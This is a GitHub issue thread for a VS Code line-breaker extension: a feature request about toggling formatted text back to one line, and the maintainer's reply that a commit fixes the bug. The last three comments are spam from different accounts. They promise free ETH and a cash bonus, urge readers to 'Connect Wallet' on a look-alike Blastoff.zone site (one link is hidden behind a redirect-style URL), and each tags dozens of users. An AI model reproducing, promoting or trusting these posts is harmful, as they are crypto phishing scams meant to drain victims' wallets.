### ISSUE TITLE
[FEATURE] User experience improvement

### ISSUE THREAD

**Issue by cdengxepam** [zhengxin-wang/line-breaker#1]
Hi @zhengxin-wang 

Could you please consider **switch** interaction while formatting the object:

Reproduce Steps:

Step1. Select lines you want to change
![image](https://github.com/zhengxin-wang/line-breaker/assets/142557369/2cee53a0-83e0-4d5f-bda3-edf743731929)

Step2. Tap **ALT + CTRL + L**
![image](https://github.com/zhengxin-wang/line-breaker/assets/142557369/f0fb3d68-0696-4ca7-bf5f-6ffa6b63c708)

Step3. For now, if I tap **ALT + CTRL + L**, we can not switch back, and got this error
![image](https://github.com/zhengxin-wang/line-breaker/assets/142557369/237157ed-e0d7-4521-b099-615552726889)

Is there any possibility to enable users to switch back and forth without doing something manually, which means I can still switch back as one line on Step3

**Comment by zhengxin-wang** [comment]
Hi @cdengxepam , this issue is due to the processing logic bug. It should process your selected content as single line text. 
Issue is fixed in this commit [3280c5e](https://github.com/zhengxin-wang/line-breaker/commit/3280c5e4e8f79ee9614010682d1dd561f9ab8fe9) It will be published to VS Code market later. Thanks for your feedback. It helps make this plugin better.

**Comment by jhonnybail** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
Up-Tian, @turisesonia, @coffiasd, @8U61ife, @feymanpaper, @elian9, @Lt-wei, @B1eed, @MatrixA, @samgoodman007, @jingkang99, @bbenzikry, @smallknife1120, @hoomjac, @nini654, @kwokky, @betamake, @geekwho-eth, @xiaopin, @RealCoolSnow, @BaffinLee, @CirnoBreak, @Hardcoreyoyo, @drafish, @li3500764, @Mahiro2211, @MiaCutie, @YirunLi, @huangzhong, @cyminer, @JinweiOS, @sunShineLoveMe, @wkmie, @857ciwei, @wj0s3ph, @Gtong23, @nickwanhere, @toomanyopenfiles, @wuqinqiang, @AC-greener, @watsonnnnn, @Octane0411, @a754962942, @LiRiu, @L040610, @LikeRainDay, @Peefy, @chapin666, @enjoyou, @WeirdoPunk

**Comment by GTMany** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
xlin0721, @chilledsaint0716, @Sicmatr1x, @booooodv, @Ariel181830, @MessageDream, @steward007, @327840386, @liey1, @paranoia445, @pcdotfan, @prur, @oregoncecilia, @cbgz121, @weiguangchao, @keyzhu1998, @chikaku, @mario1in, @tttlonglonglong, @atomzz-code, @cy3107, @rookie-wong, @gh0stkey, @yushiwuzheng666, @l20, @AutarkXu, @AuyeungChunghim, @bingooooooooooooo, @Wmengti, @zard-zhang, @JYao10247, @hebochang, @chenlike, @dantangfan, @wkler, @xianglinhe, @jaaia, @pengdaCN, @lrqstudy, @SolidityGo, @edwardddsong, @liruifengv, @dragonH, @chaosssock, @CHYbeta, @Zabreture, @yanqic, @zhiyuan2007, @zk-luke, @hmbool

**Comment by ErichUanna** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
Dtrahon, @LucasYang7, @Imagine-Tom, @DoubleMice, @han04, @huusan, @jarl0415, @SiuMai99, @BrianSeong99, @zxiaofan, @jockie911, @definemo2022, @joelhy, @firecatzkj, @xingxinglian, @maidangdang1, @mavisguan, @feixiang-1, @coder-zjh, @LvDj, @StuartYang, @1982julie, @Andy123qq4, @lalazaz, @anotherfre, @MyJoiT, @useafter, @kinginconntry, @Akmzing, @AarNtyon, @jacky7788, @sapt36, @Ming900907, @ChooseyLife, @yufengwang, @sakukuku, @h2ero, @scriptsman, @lxrmido, @CyruVs, @v1otusc, @JeffCFChang, @qinwenkang, @jacob-chia, @D4rkD0g, @jiujiuwu, @aixingjuele, @alfred141, @Klinola, @vito-L
